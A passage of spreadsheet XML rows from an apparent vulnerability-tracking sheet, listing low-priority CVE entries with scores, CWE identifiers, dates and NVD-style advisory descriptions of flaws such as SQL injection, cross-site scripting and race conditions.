        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86515</t>
        </is>
      </c>
      <c r="C5989" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5989" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5989" s="5" t="inlineStr"/>
      <c r="F5989" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5989" s="5" t="inlineStr"/>
      <c r="H5989" s="5" t="inlineStr"/>
      <c r="I5989" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5989" s="5" t="inlineStr"/>
      <c r="K5989" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="L5989" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in vgmstream up to r2117. Impacted is the function add_entry of the file src/meta/txtp_parser.c of the component txtp. Such manipulation of the argument range_start/range_end leads to resource consumption. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The name of the patch is 4b6a02dd1aff6428255db912563d77d4cb0a143e. It is advisable to implement a patch to correct this issue.</t>
        </is>
      </c>
      <c r="M5989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86515</t>
        </is>
      </c>
    </row>
    <row r="5990">
      <c r="A5990" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86517</t>
        </is>
      </c>
      <c r="C5990" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5990" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5990" s="5" t="inlineStr"/>
      <c r="F5990" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5990" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H5990" s="5" t="inlineStr"/>
      <c r="I5990" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5990" s="5" t="inlineStr"/>
      <c r="K5990" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5990" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in itsourcecode Sales and Inventory System 1.0. The impacted element is the function mysqli_query of the file /pages/us_searchfrm.php. Executing a manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M5990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86517</t>
        </is>
      </c>
    </row>
    <row r="5991">
      <c r="A5991" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86518</t>
        </is>
      </c>
      <c r="C5991" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5991" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5991" s="5" t="inlineStr"/>
      <c r="F5991" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5991" s="5" t="inlineStr"/>
      <c r="H5991" s="5" t="inlineStr"/>
      <c r="I5991" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5991" s="5" t="inlineStr"/>
      <c r="K5991" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5991" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in code-projects Student Crud Operation 1.0. This affects an unknown function of the file /edit.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M5991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86518</t>
        </is>
      </c>
    </row>
    <row r="5992">
      <c r="A5992" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86668</t>
        </is>
      </c>
      <c r="C5992" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5992" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5992" s="5" t="inlineStr"/>
      <c r="F5992" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5992" s="5" t="inlineStr"/>
      <c r="H5992" s="5" t="inlineStr"/>
      <c r="I5992" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5992" s="5" t="inlineStr"/>
      <c r="K5992" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L5992" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in aircheng-org iWebShop-5 up to 5.15. The impacted element is the function uploadFile of the file controllers/pic.php. Such manipulation of the argument outerSrc/selectPhoto leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M5992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86668</t>
        </is>
      </c>
    </row>
    <row r="5993">
      <c r="A5993" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86674</t>
        </is>
      </c>
      <c r="C5993" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5993" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5993" s="5" t="inlineStr"/>
      <c r="F5993" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5993" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H5993" s="5" t="inlineStr"/>
      <c r="I5993" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5993" s="5" t="inlineStr"/>
      <c r="K5993" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="L5993" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this vulnerability is the function session_start of the file login.php. The manipulation results in session fixiation. The attack can be launched remotely. The exploit has been made public and could be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M5993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86674</t>
        </is>
      </c>
    </row>
    <row r="5994">
      <c r="A5994" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86675</t>
        </is>
      </c>
      <c r="C5994" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5994" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5994" s="5" t="inlineStr"/>
      <c r="F5994" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5994" s="5" t="inlineStr"/>
      <c r="H5994" s="5" t="inlineStr"/>
      <c r="I5994" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5994" s="5" t="inlineStr"/>
      <c r="K5994" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L5994" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in itsourcecode Sales and Inventory System 1.0. This affects an unknown part of the file /pages/us_edit.php. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="M5994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86675</t>
        </is>
      </c>
    </row>
    <row r="5995">
      <c r="A5995" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86744</t>
        </is>
      </c>
      <c r="C5995" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5995" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5995" s="5" t="inlineStr"/>
      <c r="F5995" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5995" s="5" t="inlineStr"/>
      <c r="H5995" s="5" t="inlineStr"/>
      <c r="I5995" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5995" s="5" t="inlineStr"/>
      <c r="K5995" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L5995" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT 8.6.3 and earlier (and develop pre-release commits prior to the fix) contain a race condition in the asset checkout paths. Api\AssetsController::checkout() and Assets\AssetCheckoutController::store() call Asset::availableForCheckout() outside the mutation path and then invoke Asset::checkOut() without taking a row lock or re-checking availability, so two concurrent checkout requests for the same available asset can both observe it as available and both commit. This produces duplicate checkout-history rows, a doubled checkout_counter, and two CheckoutableCheckedOut events for a single-assignment asset, corrupting the audit trail and utilization/reconciliation reporting; the asset's final assigned_to remains singular, so the visible assignment stays intact. Exploitation requires an authenticated session holding the assets.checkout permission (or superuser) and precise concurrent timing. Fixed in 8.7.0.</t>
        </is>
      </c>
      <c r="M5995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86744</t>
        </is>
      </c>
    </row>
    <row r="5996">
      <c r="A5996" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87923</t>
        </is>
      </c>
      <c r="C5996" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5996" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5996" s="5" t="inlineStr"/>
      <c r="F5996" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5996" s="5" t="inlineStr"/>
      <c r="H5996" s="5" t="inlineStr"/>
      <c r="I5996" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5996" s="5" t="inlineStr"/>
      <c r="K5996" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L5996" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Rizwan17 inventory-management-system up to bfe78a330d01bb26b9daec5dc9ecd5c77900e03f. Affected by this issue is some unknown functionality of the file includes/DBOperation.php of the component List Handler. This manipulation of the argument category_name/brand_name/product_name causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M5996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87923</t>
        </is>
      </c>
    </row>
    <row r="5997">
      <c r="A5997" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87926</t>
        </is>
      </c>
      <c r="C5997" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="D5997" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5997" s="5" t="inlineStr"/>
      <c r="F5997" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5997" s="5" t="inlineStr"/>
      <c r="H5997" s="5" t="inlineStr"/>
      <c r="I5997" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5997" s="5" t="inlineStr"/>
      <c r="K5997" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L5997" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Rizwan17 inventory-management-system up to bfe78a330d01bb26b9daec5dc9ecd5c77900e03f. This issue affects some unknown processing of the file index.php of the component Login Page. Executing a manipulation of the argument msg can lead to cross site scripting. The attack can be launched remotely. The exploit has been published and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M5997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87926</t>
        </is>
      </c>
    </row>
    <row r="5998">
      <c r="A5998" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5998" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71402</t>
        </is>
      </c>
      <c r="C5998" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D5998" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5998" s="5" t="inlineStr"/>
      <c r="F5998" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5998" s="5" t="inlineStr"/>
      <c r="H5998" s="5" t="inlineStr"/>
      <c r="I5998" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J5998" s="5" t="inlineStr"/>
      <c r="K5998" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L5998" s="5" t="inlineStr">
        <is>
          <t>better-auth versions greater than 1.3.34 and before 1.4.0 contain a vulnerability in the multi-session plugin's /sign-out after-hook, which trusts raw multi-session cookies and forwards extracted values to internalAdapter.deleteSessions without verifying the cookie signature (e.g., via getSignedCookie). An attacker can supply a forged _multi-* cookie to trigger deletion of arbitrary session tokens.</t>
        </is>
      </c>
      <c r="M5998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71402</t>
        </is>
      </c>
    </row>
    <row r="5999">
      <c r="A5999" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16003</t>
        </is>
      </c>
      <c r="C5999" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D5999" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5999" s="5" t="inlineStr"/>
      <c r="F5999" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5999" s="5" t="inlineStr"/>
      <c r="H5999" s="5" t="inlineStr"/>
      <c r="I5999" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5999" s="5" t="inlineStr"/>
      <c r="K5999" s="5" t="inlineStr">
        <is>
          <t>CWE-782</t>
        </is>
      </c>
      <c r="L5999" s="5" t="inlineStr">
        <is>
          <t>Exposed IOCTL with Insufficient Access Control in Armoury Crate driver allows a local user to add an arbitrary process identifier to the driver's whitelist via a crafted IOCTL request by bypassing the driver's verification.Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M5999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16003</t>
        </is>
      </c>
    </row>
    <row r="6000">
      <c r="A6000" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48791</t>
        </is>
      </c>
      <c r="C6000" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6000" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6000" s="5" t="inlineStr"/>
      <c r="F6000" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6000" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H6000" s="5" t="inlineStr"/>
      <c r="I6000" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J6000" s="5" t="inlineStr"/>
      <c r="K6000" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L6000" s="5" t="inlineStr">
        <is>
          <t>sigstore-java is a sigstore java client for interacting with sigstore infrastructure. Version 2.0.0 erroneously removed verification of the integrated (Rekor entry) time) against the Fulcio certificate. Version 2.1.0 re-added this verification with enhancements that adhere to the Sigstore verification spec. The old sigstore-conformance test for this check was built incorrectly. This vulnerability impacts only users verifying bundles with `dev.sigstore:sigstore-java:2.0.0`. Older versions are not affected; it is fixed in `dev.sigstore:sigstore-java:2.1.0` A malicious actor may exploit this if they were able to access a users system and exfiltrate the temporary private key used during signing and then reuse an old fulcio certificate later without requiring direct access to the user's credentials. Users may protect themselves by re-verifying their artifacts using the newest sigstore-java or another current sigstore client. Transparency logs may also be audited for unauthorized signatures for a suspected reused identity.</t>
        </is>
      </c>
      <c r="M6000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48791</t>
        </is>
      </c>
    </row>
    <row r="6001">
      <c r="A6001" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52791</t>
        </is>
      </c>
      <c r="C6001" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6001" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6001" s="5" t="inlineStr"/>
      <c r="F6001" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6001" s="5" t="inlineStr"/>
      <c r="H6001" s="5" t="inlineStr"/>
      <c r="I6001" s="5" t="inlineStr">
        <is>
          <t>2026-07-29</t>
        </is>
      </c>
      <c r="J6001" s="5" t="inlineStr"/>
      <c r="K6001" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L6001" s="5" t="inlineStr">
        <is>
          <t>fuse-overl</t>
        </is>
      </c>
      <c r="M6001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52791</t>
        </is>
      </c>
    </row>
    <row r="6002">
      <c r="A6002" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53759</t>
        </is>
      </c>
      <c r="C6002" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6002" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6002" s="5" t="inlineStr"/>
      <c r="F6002" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6002" s="5" t="inlineStr">
        <is>
          <t>docker, python</t>
        </is>
      </c>
      <c r="H6002" s="5" t="inlineStr"/>
      <c r="I6002" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J6002" s="5" t="inlineStr"/>
      <c r="K6002" s="5" t="inlineStr">
        <is>
          <t>CWE-377</t>
        </is>
      </c>
      <c r="L6002" s="5" t="inlineStr">
        <is>
          <t>linuxfabrik-lib provides Python modules for database access, caching, shell execution, and API integrations. Prior to version 4.2.0, db_sqlite.py created SQLite databases at predictable paths in the shared /tmp directory and followed attacker-created symbolic links at those paths. An attacker who controls a local monitoring account can create a symlink such as /tmp/linuxfabrik-monitoring-plugins-docker-stats.db and then trigger a sudo-authorized plugin, causing the root process to create or modify the symlink target. The primitive can overwrite arbitrary paths, cause denial of service, or manipulate an existing SQLite database through a crafted rollback journal or write-ahead log. The Monitoring Plugins integration also moved plugin caches through lib.db_sqlite.get_db_path() so they use the secured per-user directory. This issue is fixed in version 4.2.0.</t>
        </is>
      </c>
      <c r="M6002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53759</t>
        </is>
      </c>
    </row>
    <row r="6003">
      <c r="A6003" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67442</t>
        </is>
      </c>
      <c r="C6003" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6003" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6003" s="5" t="inlineStr"/>
      <c r="F6003" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6003" s="5" t="inlineStr"/>
      <c r="H6003" s="5" t="inlineStr"/>
      <c r="I6003" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J6003" s="5" t="inlineStr"/>
      <c r="K6003" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-459</t>
        </is>
      </c>
      <c r="L6003" s="5" t="inlineStr">
        <is>
          <t>FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. Prior to 1.3.3, DELETE /api/roles removes role definitions through server/runtime/users/usrstorage.js but does not remove the deleted role identifier from each user's info.roles array or the runtime usersMap cache. If a permission configuration still references that identifier, an affected user can retain authorization rights that an administrator intended to revoke, causing residual privilege, inconsistent access-control state, and misleading audit results. This issue is fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="M6003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67442</t>
        </is>
      </c>
    </row>
    <row r="6004">
      <c r="A6004" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72729</t>
        </is>
      </c>
      <c r="C6004" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6004" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6004" s="5" t="inlineStr"/>
      <c r="F6004" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6004" s="5" t="inlineStr"/>
      <c r="H6004" s="5" t="inlineStr"/>
      <c r="I6004" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J6004" s="5" t="inlineStr"/>
      <c r="K6004" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L6004" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. Prior to 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0, the discourse-local-dates plugin rendered crafted local-date format data as HTML on sites with a modified or disabled default Content Security Policy. This issue is fixed in versions 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0.</t>
        </is>
      </c>
      <c r="M6004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72729</t>
        </is>
      </c>
    </row>
    <row r="6005">
      <c r="A6005" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79783</t>
        </is>
      </c>
      <c r="C6005" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6005" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6005" s="5" t="inlineStr"/>
      <c r="F6005" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6005" s="5" t="inlineStr"/>
      <c r="H6005" s="5" t="inlineStr"/>
      <c r="I6005" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J6005" s="5" t="inlineStr"/>
      <c r="K6005" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="L6005" s="5" t="inlineStr">
        <is>
          <t>rclone before 1.74.4 fails to mask special permission bits when applying source-supplied mode metadata in the local backend, allowing attackers to set setuid/setgid bits on attacker-controlled files. When copying with metadata preservation from an untrusted remote, attackers can plant a setuid binary that escalates privileges to root if rclone runs as root, or to the service account user otherwise.</t>
        </is>
      </c>
      <c r="M6005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79783</t>
        </is>
      </c>
    </row>
    <row r="6006">
      <c r="A6006" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85406</t>
        </is>
      </c>
      <c r="C6006" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6006" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6006" s="5" t="inlineStr"/>
      <c r="F6006" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6006" s="5" t="inlineStr"/>
      <c r="H6006" s="5" t="inlineStr"/>
      <c r="I6006" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6006" s="5" t="inlineStr"/>
      <c r="K6006" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L6006" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Eleveo Quality Management 9.7.0. This vulnerability affects unknown code of the component Conversation Review. The manipulation leads to cross site scripting. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="M6006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85406</t>
        </is>
      </c>
    </row>
    <row r="6007">
      <c r="A6007" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85643</t>
        </is>
      </c>
      <c r="C6007" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6007" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6007" s="5" t="inlineStr"/>
      <c r="F6007" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6007" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H6007" s="5" t="inlineStr"/>
      <c r="I6007" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6007" s="5" t="inlineStr"/>
      <c r="K6007" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L6007" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in code-projects Online Shopping System 1.0. Impacted is the function mysqli_query of the file admin/adduser.php. Executing a manipulation of the argument mobile can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M6007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85643</t>
        </is>
      </c>
    </row>
    <row r="6008">
      <c r="A6008" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86150</t>
        </is>
      </c>
      <c r="C6008" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6008" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6008" s="5" t="inlineStr"/>
      <c r="F6008" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6008" s="5" t="inlineStr"/>
      <c r="H6008" s="5" t="inlineStr"/>
      <c r="I6008" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J6008" s="5" t="inlineStr"/>
      <c r="K6008" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="L6008" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Tenda CP3 27.5.57.101. Impacted is an unknown function of the file custom-x/softap/hostapd. Such manipulation of the argument wpa_passphrase leads to hard-coded credentials. The attack can be launched remotely. The exploit has been disclosed publicly and may be used.</t>
        </is>
      </c>
      <c r="M6008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86150</t>
        </is>
      </c>
    </row>
    <row r="6009">
      <c r="A6009" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86181</t>
        </is>
      </c>
      <c r="C6009" s="5" t="n">
        <v>2</v>
      </c>
      <c r="D6009" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E6009" s="5" t="inlineStr"/>
      <c r="F6009" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6009" s="5" t="inlineStr"/>
      <c r="H6009" s="5" t="inlineStr"/>
      <c r="I6009" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J6009" s="5" t="inlineStr"/>
      <c r="K6009" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L6009" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in code-projects Task Management System 1.0. Affected by this issue is some unknown functionality of the file /user/UpdateUserProfile.php of the component User Profile Update. The manipulation of the argument lname results in cross site scripting. The attack can be launched remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
